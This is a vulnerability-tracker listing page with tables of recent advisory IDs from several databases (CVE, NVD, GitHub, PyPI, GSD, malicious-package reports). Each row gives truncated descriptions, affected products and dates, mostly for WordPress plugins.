Recent vulnerabilities

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
cve-2025-2814	N/A	Crypt::CBC versions between 1.21 and 3.05 for Perl may…	LDS	Crypt::CBC	2025-04-12T23:41:48.511Z	2025-06-14T20:18:32.312Z
cve-2024-45777	6.7 (v3.1)	Grub2: grub-core/gettext: integer overflow leads to he…			2025-02-19T17:54:01.926Z	2025-06-14T13:43:59.331Z
cve-2025-5238		YITH WooCommerce Wishlist <= 4.5.0 - Authenticated (Co…	yithemes	YITH WooCommerce Wishlist	2025-06-14T09:23:34.023Z	2025-06-14T09:23:34.023Z
cve-2025-5337		Slider, Gallery, and Carousel by MetaSlider <= 3.98.0 …	metaslider	Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider	2025-06-14T09:23:33.099Z	2025-06-14T09:23:33.099Z
cve-2025-4667		Simply Schedule Appointments <= 1.6.8.30 - Authenticat…	croixhaug	Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin	2025-06-14T09:23:33.636Z	2025-06-14T09:23:33.636Z
cve-2025-6063		XiSearch bar <= 2.6 - Cross-Site Request Forgery to St…	dmitry78	XiSearch bar	2025-06-14T08:23:27.045Z	2025-06-14T08:23:27.045Z
cve-2025-6061		kk Youtube Video <= 0.2 - Authenticated (Contributor+)…	bhittani	kk Youtube Video	2025-06-14T08:23:26.674Z	2025-06-14T08:23:26.674Z
cve-2025-5336		Click to Chat <= 4.22 - Authenticated (Contributor+) S…	holithemes	Click to Chat – HoliThemes	2025-06-14T08:23:26.308Z	2025-06-14T08:23:26.308Z
cve-2025-6070		Restrict File Access <= 1.1.2 - Authenticated (Subscri…	josxha	Restrict File Access	2025-06-14T08:23:25.593Z	2025-06-14T08:23:25.593Z
cve-2025-6062		Yougler Blogger Profile Page <= v1.01 - Cross-Site Req…	netlatch	Yougler Blogger Profile Page	2025-06-14T08:23:25.957Z	2025-06-14T08:23:25.957Z
cve-2025-4592		AI Image Lab – Free AI Image Generator <= 1.0.6 - Cros…	aspengrovestudios	AI Image Lab – Free AI Image Generator	2025-06-14T08:23:25.234Z	2025-06-14T08:23:25.234Z
cve-2025-6055		Zen Sticky Social <= 0.3 - Cross-Site Request Forgery …	bogdanding	Zen Sticky Social	2025-06-14T08:23:24.260Z	2025-06-14T08:23:24.260Z
cve-2025-5589		StreamWeasels Kick Integration <= 1.1.3 - Authenticate…	streamweasels	StreamWeasels Kick Integration	2025-06-14T08:23:24.655Z	2025-06-14T08:23:24.655Z
cve-2025-6040		Easy Flashcards <= 0.1 - Cross-Site Request Forgery to…	sagesony	Easy Flashcards	2025-06-14T08:23:23.104Z	2025-06-14T08:23:23.104Z
cve-2025-4200		Zagg - Electronics & Accessories WooCommerce WordPress…	BZOTheme	Zagg - Electronics & Accessories WooCommerce WordPress Theme	2025-06-14T08:23:23.869Z	2025-06-14T08:23:23.869Z
cve-2025-4187		UserPro - Community and User Profile WordPress Plugin …	n/a	UserPro - Community and User Profile WordPress Plugin	2025-06-14T08:23:23.478Z	2025-06-14T08:23:23.478Z
cve-2025-6064		WP URL Shortener <= 1.2 - Cross-Site Request Forgery t…	djerba	WP URL Shortener	2025-06-14T08:23:22.208Z	2025-06-14T08:23:22.208Z
cve-2025-4216		DIOT SCADA with MQTT <= 1.0.5.1 - Authenticated (Contr…	scada	DIOT SCADA with MQTT	2025-06-14T08:23:22.614Z	2025-06-14T08:23:22.614Z
cve-2025-6065		Image Resizer On The Fly <= 1.1 - Unauthenticated Arbi…	wework4web	Image Resizer On The Fly	2025-06-14T08:23:21.618Z	2025-06-14T08:23:21.618Z
cve-2025-5487		AutomatorWP <= 5.2.5 - Authenticated (Administrator+) …	rubengc	AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress	2025-06-14T06:41:27.663Z	2025-06-14T06:41:27.663Z
cve-2025-3234		File Manager Pro – Filester <= 1.8.8 - Authenticated (…	ninjateam	File Manager Pro – Filester	2025-06-14T05:32:01.040Z	2025-06-14T05:32:01.040Z
cve-2025-30084	N/A	Extension - rsjoomla.com - Reflected XSS vulnerability…	rsjoomla.com	RSMail! component for Joomla	2025-06-05T13:20:36.856Z	2025-06-14T04:36:30.353Z
cve-2025-27689	7.8 (v3.1)	Dell iDRAC Tools, version(s) prior to 11.3.0.0, c…	Dell	iDRAC Tools	2025-06-12T20:36:24.943Z	2025-06-14T03:56:24.614Z
cve-2025-3473	6.7 (v3.1)	IBM Security Guardium privilege escalation	IBM	Security Guardium	2025-06-11T14:24:46.027Z	2025-06-14T03:56:23.541Z
cve-2025-32711	9.3 (v3.1)	M365 Copilot Information Disclosure Vulnerability	Microsoft	Microsoft 365 Copilot	2025-06-11T13:22:38.935Z	2025-06-14T03:56:22.454Z
cve-2025-5687	N/A	A vulnerability in Mozilla VPN on macOS allows pr…	Mozilla	Mozilla VPN 2.28.0	2025-06-11T12:07:49.739Z	2025-06-14T03:56:21.196Z
cve-2025-4228	4.6 (v4.0)	Cortex XDR Broker VM: Privilege Escalation (PE) Vulner…	Palo Alto Networks	Cortex XDR Broker VM	2025-06-12T23:41:37.071Z	2025-06-14T03:56:20.140Z
cve-2025-4232	8.5 (v4.0)	GlobalProtect: Authenticated Code Injection Through Wi…	Palo Alto Networks	GlobalProtect App	2025-06-12T23:22:34.993Z	2025-06-14T03:56:19.065Z
cve-2025-4613	7.1 (v4.0)	Client side RCE in Google Web Designer App	Google	Web Designer App	2025-06-12T09:06:05.252Z	2025-06-14T03:56:18.019Z
cve-2025-26521		Apache CloudStack: CKS cluster in project exposes user…	Apache Software Foundation	Apache CloudStack	2025-06-10T23:08:48.602Z	2025-06-14T03:56:16.937Z

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS	Description	Vendor	Product	Published	Updated
cve-2025-2814	N/A	Crypt::CBC versions between 1.21 and 3.05 for Perl may…	LDS	Crypt::CBC	2025-04-12T23:41:48.511Z	2025-06-14T20:18:32.312Z
cve-2025-5337		Slider, Gallery, and Carousel by MetaSlider <= 3.98.0 …	metaslider	Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider	2025-06-14T09:23:33.099Z	2025-06-14T09:23:33.099Z
cve-2025-5238		YITH WooCommerce Wishlist <= 4.5.0 - Authenticated (Co…	yithemes	YITH WooCommerce Wishlist	2025-06-14T09:23:34.023Z	2025-06-14T09:23:34.023Z
cve-2025-4667		Simply Schedule Appointments <= 1.6.8.30 - Authenticat…	croixhaug	Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin	2025-06-14T09:23:33.636Z	2025-06-14T09:23:33.636Z
cve-2025-6070		Restrict File Access <= 1.1.2 - Authenticated (Subscri…	josxha	Restrict File Access	2025-06-14T08:23:25.593Z	2025-06-14T08:23:25.593Z
cve-2025-6065		Image Resizer On The Fly <= 1.1 - Unauthenticated Arbi…	wework4web	Image Resizer On The Fly	2025-06-14T08:23:21.618Z	2025-06-14T08:23:21.618Z
cve-2025-6064		WP URL Shortener <= 1.2 - Cross-Site Request Forgery t…	djerba	WP URL Shortener	2025-06-14T08:23:22.208Z	2025-06-14T08:23:22.208Z
cve-2025-6063		XiSearch bar <= 2.6 - Cross-Site Request Forgery to St…	dmitry78	XiSearch bar	2025-06-14T08:23:27.045Z	2025-06-14T08:23:27.045Z
cve-2025-6062		Yougler Blogger Profile Page <= v1.01 - Cross-Site Req…	netlatch	Yougler Blogger Profile Page	2025-06-14T08:23:25.957Z	2025-06-14T08:23:25.957Z
cve-2025-6061		kk Youtube Video <= 0.2 - Authenticated (Contributor+)…	bhittani	kk Youtube Video	2025-06-14T08:23:26.674Z	2025-06-14T08:23:26.674Z
cve-2025-6055		Zen Sticky Social <= 0.3 - Cross-Site Request Forgery …	bogdanding	Zen Sticky Social	2025-06-14T08:23:24.260Z	2025-06-14T08:23:24.260Z
cve-2025-6040		Easy Flashcards <= 0.1 - Cross-Site Request Forgery to…	sagesony	Easy Flashcards	2025-06-14T08:23:23.104Z	2025-06-14T08:23:23.104Z
cve-2025-5589		StreamWeasels Kick Integration <= 1.1.3 - Authenticate…	streamweasels	StreamWeasels Kick Integration	2025-06-14T08:23:24.655Z	2025-06-14T08:23:24.655Z
cve-2025-5336		Click to Chat <= 4.22 - Authenticated (Contributor+) S…	holithemes	Click to Chat – HoliThemes	2025-06-14T08:23:26.308Z	2025-06-14T08:23:26.308Z
cve-2025-4592		AI Image Lab – Free AI Image Generator <= 1.0.6 - Cros…	aspengrovestudios	AI Image Lab – Free AI Image Generator	2025-06-14T08:23:25.234Z	2025-06-14T08:23:25.234Z
cve-2025-4216		DIOT SCADA with MQTT <= 1.0.5.1 - Authenticated (Contr…	scada	DIOT SCADA with MQTT	2025-06-14T08:23:22.614Z	2025-06-14T08:23:22.614Z
cve-2025-4200		Zagg - Electronics & Accessories WooCommerce WordPress…	BZOTheme	Zagg - Electronics & Accessories WooCommerce WordPress Theme	2025-06-14T08:23:23.869Z	2025-06-14T08:23:23.869Z
cve-2025-4187		UserPro - Community and User Profile WordPress Plugin …	n/a	UserPro - Community and User Profile WordPress Plugin	2025-06-14T08:23:23.478Z	2025-06-14T08:23:23.478Z
cve-2025-5487		AutomatorWP <= 5.2.5 - Authenticated (Administrator+) …	rubengc	AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress	2025-06-14T06:41:27.663Z	2025-06-14T06:41:27.663Z
cve-2025-3234		File Manager Pro – Filester <= 1.8.8 - Authenticated (…	ninjateam	File Manager Pro – Filester	2025-06-14T05:32:01.040Z	2025-06-14T05:32:01.040Z
cve-2025-6059		Seraphinite Accelerator <= 2.27.21 - Cross-Site Reques…	seraphinitesoft	Seraphinite Accelerator	2025-06-14T01:43:25.206Z	2025-06-14T01:43:25.206Z
cve-2025-50150	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:05.207Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:05.207Z
cve-2025-50149	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:05.771Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:05.771Z
cve-2025-50148	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:06.570Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:06.570Z
cve-2025-50147	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:07.066Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:07.066Z
cve-2025-50146	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:07.543Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:07.543Z
cve-2025-50145	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:08.170Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:08.170Z
cve-2025-50144	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:08.756Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:08.756Z
cve-2025-50143	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:09.209Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:09.209Z
cve-2025-50142	N/A	{'providerMetadata': {'orgId': '6abe59d8-c742-4dff-8ce8-9b0ca1073da8', 'shortName': 'fortinet', 'dateUpdated': '2025-06-14T02:55:09.668Z'}, 'rejectedReasons': [{'lang': 'en', 'value': 'Not used'}]}	N/A	N/A		2025-06-14T02:55:09.668Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
fkie_cve-2025-2814	Crypt::CBC versions between 1.21 and 3.05 for Perl may use the rand() function as the default sourc…	2025-04-13T00:15:14.997	2025-06-14T21:15:18.687
fkie_cve-2025-5337	The Slider, Gallery, and Carousel by MetaSlider plugin for WordPress is vulnerable to Stored Cross-…	2025-06-14T10:15:20.153	2025-06-14T10:15:20.153
fkie_cve-2025-5238	The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via…	2025-06-14T10:15:19.987	2025-06-14T10:15:19.987
fkie_cve-2025-4667	The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress…	2025-06-14T10:15:18.853	2025-06-14T10:15:18.853
fkie_cve-2025-6070	The Restrict File Access plugin for WordPress is vulnerable to Directory Traversal in all versions …	2025-06-14T09:15:25.180	2025-06-14T09:15:25.180
fkie_cve-2025-6065	The Image Resizer On The Fly plugin for WordPress is vulnerable to arbitrary file deletion due to i…	2025-06-14T09:15:25.020	2025-06-14T09:15:25.020
fkie_cve-2025-6064	The WP URL Shortener plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versio…	2025-06-14T09:15:24.853	2025-06-14T09:15:24.853
fkie_cve-2025-6063	The XiSearch bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions u…	2025-06-14T09:15:24.693	2025-06-14T09:15:24.693
fkie_cve-2025-6062	The Yougler Blogger Profile Page plugin for WordPress is vulnerable to Cross-Site Request Forgery i…	2025-06-14T09:15:24.520	2025-06-14T09:15:24.520
fkie_cve-2025-6061	The kk Youtube Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plug…	2025-06-14T09:15:24.307	2025-06-14T09:15:24.307
fkie_cve-2025-6055	The Zen Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versi…	2025-06-14T09:15:24.050	2025-06-14T09:15:24.050
fkie_cve-2025-6040	The Easy Flashcards plugin for WordPress is vulnerable to Cross-Site Request Forgery in all version…	2025-06-14T09:15:23.873	2025-06-14T09:15:23.873
fkie_cve-2025-5589	The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scriptin…	2025-06-14T09:15:23.710	2025-06-14T09:15:23.710
fkie_cve-2025-5336	The Click to Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘data-n…	2025-06-14T09:15:23.527	2025-06-14T09:15:23.527
fkie_cve-2025-4592	The AI Image Lab – Free AI Image Generator plugin for WordPress is vulnerable to Cross-Site Request…	2025-06-14T09:15:23.333	2025-06-14T09:15:23.333
fkie_cve-2025-4216	The DIOT SCADA with MQTT plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the …	2025-06-14T09:15:23.160	2025-06-14T09:15:23.160
fkie_cve-2025-4200	The Zagg - Electronics & Accessories WooCommerce WordPress Theme theme for WordPress is vulnerable …	2025-06-14T09:15:22.990	2025-06-14T09:15:22.990
fkie_cve-2025-4187	The UserPro - Community and User Profile WordPress Plugin plugin for WordPress is vulnerable to Dir…	2025-06-14T09:15:22.050	2025-06-14T09:15:22.050
fkie_cve-2025-5487	The AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordP…	2025-06-14T07:15:17.870	2025-06-14T07:15:17.870
fkie_cve-2025-3234	The File Manager Pro – Filester plugin for WordPress is vulnerable to arbitrary file uploads due to…	2025-06-14T06:15:18.117	2025-06-14T06:15:18.117
fkie_cve-2025-6059	The Seraphinite Accelerator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all…	2025-06-14T03:15:22.283	2025-06-14T03:15:22.283
fkie_cve-2025-50150	Rejected reason: Not used	2025-06-14T03:15:22.220	2025-06-14T03:15:22.220
fkie_cve-2025-50149	Rejected reason: Not used	2025-06-14T03:15:22.157	2025-06-14T03:15:22.157
fkie_cve-2025-50148	Rejected reason: Not used	2025-06-14T03:15:22.097	2025-06-14T03:15:22.097
fkie_cve-2025-50147	Rejected reason: Not used	2025-06-14T03:15:22.033	2025-06-14T03:15:22.033
fkie_cve-2025-50146	Rejected reason: Not used	2025-06-14T03:15:21.977	2025-06-14T03:15:21.977
fkie_cve-2025-50145	Rejected reason: Not used	2025-06-14T03:15:21.910	2025-06-14T03:15:21.910
fkie_cve-2025-50144	Rejected reason: Not used	2025-06-14T03:15:21.860	2025-06-14T03:15:21.860
fkie_cve-2025-50143	Rejected reason: Not used	2025-06-14T03:15:21.793	2025-06-14T03:15:21.793
fkie_cve-2025-50142	Rejected reason: Not used	2025-06-14T03:15:21.693	2025-06-14T03:15:21.693

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ghsa-xpfq-7j72-x4px	Crypt::CBC versions between 1.21 and 3.04 for Perl may use the rand() function as the default sourc…	2025-04-13T00:30:22Z	2025-06-14T21:34:52Z
ghsa-vhxw-84g6-ch4r	The Slider, Gallery, and Carousel by MetaSlider plugin for WordPress is vulnerable to Stored Cross-…	2025-06-14T12:31:35Z	2025-06-14T12:31:35Z
ghsa-phwc-hg84-m6jx	The YITH WooCommerce Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via…	2025-06-14T12:31:35Z	2025-06-14T12:31:35Z
ghsa-726g-7g37-3pjg	The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress…	2025-06-14T12:31:35Z	2025-06-14T12:31:35Z
ghsa-mmmr-63h5-2fmw	The XiSearch bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions u…	2025-06-14T09:32:02Z	2025-06-14T09:32:03Z
ghsa-jp5v-6hxw-6c5f	The kk Youtube Video plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plug…	2025-06-14T09:32:02Z	2025-06-14T09:32:03Z
ghsa-hhc9-p5vj-px33	The WP URL Shortener plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versio…	2025-06-14T09:32:03Z	2025-06-14T09:32:03Z
ghsa-gxqj-2gvr-3p2f	The Image Resizer On The Fly plugin for WordPress is vulnerable to arbitrary file deletion due to i…	2025-06-14T09:32:03Z	2025-06-14T09:32:03Z
ghsa-ffpc-23x7-9cwj	The Yougler Blogger Profile Page plugin for WordPress is vulnerable to Cross-Site Request Forgery i…	2025-06-14T09:32:03Z	2025-06-14T09:32:03Z
ghsa-f7j7-4g7x-mp48	The Zen Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versi…	2025-06-14T09:32:02Z	2025-06-14T09:32:03Z
ghsa-c96c-cv9h-9f96	The Restrict File Access plugin for WordPress is vulnerable to Directory Traversal in all versions …	2025-06-14T09:32:03Z	2025-06-14T09:32:03Z
ghsa-vm9c-gv5w-3h2f	The UserPro - Community and User Profile WordPress Plugin plugin for WordPress is vulnerable to Dir…	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-qfq8-jc26-7f48	The DIOT SCADA with MQTT plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the …	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-hwxq-8wxw-6cx3	The Easy Flashcards plugin for WordPress is vulnerable to Cross-Site Request Forgery in all version…	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-hg2r-rg5c-cgfv	The AI Image Lab – Free AI Image Generator plugin for WordPress is vulnerable to Cross-Site Request…	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-89w2-57ff-4989	The Zagg - Electronics & Accessories WooCommerce WordPress Theme theme for WordPress is vulnerable …	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-83pp-hvhj-8fv5	The Click to Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘data-n…	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-7c7p-ggr4-28g8	The StreamWeasels Kick Integration plugin for WordPress is vulnerable to Stored Cross-Site Scriptin…	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-2pff-264c-2hqm	The AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordP…	2025-06-14T09:32:02Z	2025-06-14T09:32:02Z
ghsa-m4f9-j244-5hfh	The File Manager Pro – Filester plugin for WordPress is vulnerable to arbitrary file uploads due to…	2025-06-14T06:30:31Z	2025-06-14T06:30:31Z
ghsa-w26j-5278-xhxj	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-jcph-jfm7-9jg7	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-hhh5-6rpm-wxgq	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-gp37-hv4j-g2qj	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-g22f-mfh2-pj65	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-fw32-3jxp-3gxf	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-c5fj-fp4v-3gqr	IBM Backup, Recovery and Media Services for i 7.4 and 7.5 could allow a user with the capability to…	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-6jff-f5rm-jgq5	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-6385-3ppv-p735	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z
ghsa-49w6-3ccf-2xg2	Rejected reason: Not used	2025-06-14T03:30:28Z	2025-06-14T03:30:28Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Package	Published	Updated
pysec-2024-254	A session fixation vulnerability exists in the zenml-io/zenml application, where JWT toke…	zenml	2024-04-16T00:15:11+00:00	2025-06-13T00:48:41.806476+00:00
pysec-2025-49	setuptools is a package that allows users to download, build, install, upgrade, and unins…	setuptools	2025-05-17T16:15:19+00:00	2025-06-12T22:23:11.115559+00:00
pysec-2025-48	Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm…	mobsf	2025-03-31T17:15:42+00:00	2025-06-12T22:23:10.476087+00:00
pysec-2024-253	pretix before 2024.1.1 mishandles file validation.	pretix	2024-02-26T16:28:00+00:00	2025-06-11T15:23:51.683422+00:00
pysec-2024-252	PyTorch before v2.2.0 was discovered to contain a heap buffer overflow vulnerability in t…	torch	2024-04-17T19:15:07+00:00	2025-06-10T19:22:08.948962+00:00
pysec-2024-85	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-06-10T17:22:58.503445Z
pysec-2024-84	Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-06-10T17:22:58.434654Z
pysec-2024-83	Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD…	mindsdb	2024-09-12T13:15:00Z	2025-06-10T17:22:58.367516Z
pysec-2024-82	Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB…	mindsdb	2024-09-12T13:15:00Z	2025-06-10T17:22:58.296209Z
pysec-2023-278	MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1…	mindsdb	2023-12-11T21:15:00Z	2025-06-10T17:22:58.210086Z
pysec-2024-251	Pytorch before version v2.2.0 was discovered to contain a use-after-free vulnerability in…	torch	2024-04-17T19:15:07+00:00	2025-06-10T03:12:59.077932+00:00
pysec-2025-47	An issue was discovered in Django 5.2 before 5.2.2, 5.1 before 5.1.10, and 4.2 before 4.2…	django	2025-06-05T03:15:25+00:00	2025-06-05T05:23:28.296596+00:00
pysec-2025-46	A vulnerability was found in erdogant pypickle up to 1.1.5. It has been classified as cri…	pypickle	2025-05-26T08:15:19+00:00	2025-06-03T17:36:58.579358+00:00
pysec-2025-45	A vulnerability was found in erdogant pypickle up to 1.1.5 and classified as problematic.…	pypickle	2025-05-26T07:15:26+00:00	2025-06-03T17:36:58.528116+00:00
pysec-2024-250	Pytorch before v2.2.0 has an Out-of-bounds Read vulnerability via the component torch/csr…	torch	2024-04-19T21:15:08+00:00	2025-06-03T15:23:56.072490+00:00
pysec-2023-312	Redis before 6cbea7d allows a replica to cause an assertion failure in a primary server b…	redis	2023-07-15T23:15:09Z	2025-06-02T11:48:06.372423Z
pysec-2025-44	django-helpdesk before 1.0.0 allows Sensitive Data Exposure because of os.umask(0) in mod…	django-helpdesk	2025-05-31T01:15:19+00:00	2025-05-31T03:09:35.357757+00:00
pysec-2025-43	vLLM is an inference and serving engine for large language models (LLMs). In versions sta…	vllm	2025-05-29T17:15:21+00:00	2025-05-29T19:21:01.611587+00:00
pysec-2025-42	vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Ver…	vllm	2025-04-30T01:15:51+00:00	2025-05-28T21:23:12.396609+00:00
pysec-2025-41	PyTorch is a Python package that provides tensor computation with strong GPU acceleration…	torch	2025-04-18T16:15:23+00:00	2025-05-28T15:23:37.843138+00:00
pysec-2025-40	A vulnerability in the `preprocess_string()` function of the `transformers.testing_utils`…	transformers	2025-05-19T12:15:19+00:00	2025-05-21T19:22:10.801823+00:00
pysec-2024-249	### Summary On all Label Studio versions prior to 1.11.0, data imported via file upload f…	label-studio	2024-02-22T22:15:47+00:00	2025-05-19T11:22:35.312280+00:00
pysec-2024-248	OpenCanary, a multi-protocol network honeypot, directly executed commands taken from its …	opencanary	2024-10-14T21:15:12+00:00	2025-05-16T14:23:05.150356+00:00
pysec-2025-39	motionEye is an online interface for the software motion, a video surveillance program wi…	motioneye	2025-05-14T16:15:29+00:00	2025-05-14T17:22:51.050788+00:00
pysec-2025-38	OpenStack Ironic before 29.0.1 can write unintended files to a target node disk during im…	ironic	2025-05-08T17:16:01Z	2025-05-13T04:24:03.083929Z
pysec-2024-247	A directory traversal vulnerability exists in the zenml-io/zenml repository, specifically…	zenml	2024-04-16T00:15:11+00:00	2025-05-12T15:23:53.861001+00:00
pysec-2025-37	An issue was discovered in Django 4.2 before 4.2.21, 5.1 before 5.1.9, and 5.2 before 5.2…	django	2025-05-08T04:17:18+00:00	2025-05-08T05:23:16.210893+00:00
pysec-2025-36	Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/valida…	langflow	2025-04-07T15:15:44+00:00	2025-05-07T19:22:44.993642+00:00
pysec-2024-246	Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. Starting in…	vyper	2024-04-25T17:15:50+00:00	2025-05-05T19:21:20.899426+00:00
pysec-2024-111	A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langcha…	langchain	2024-10-29T13:15:00Z	2025-05-02T18:39:47.588215Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description
gsd-2024-33903	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33884	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297	The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296	The format of the source doesn't require a description, click on the link for more details
gsd-2024-33882	The format of the source doesn't require a description, click on the link for more details

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
mal-2024-1280	Malicious code in @symplr-ux/alloy-icons (npm)	2024-04-22T08:14:41Z	2024-04-22T08:14:42Z
mal-2024-1291	Malicious code in shard-packages (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:40Z
mal-2024-1287	Malicious code in ecs-cdk (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:40Z
mal-2024-1295	Malicious code in teleport-app-example-node (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
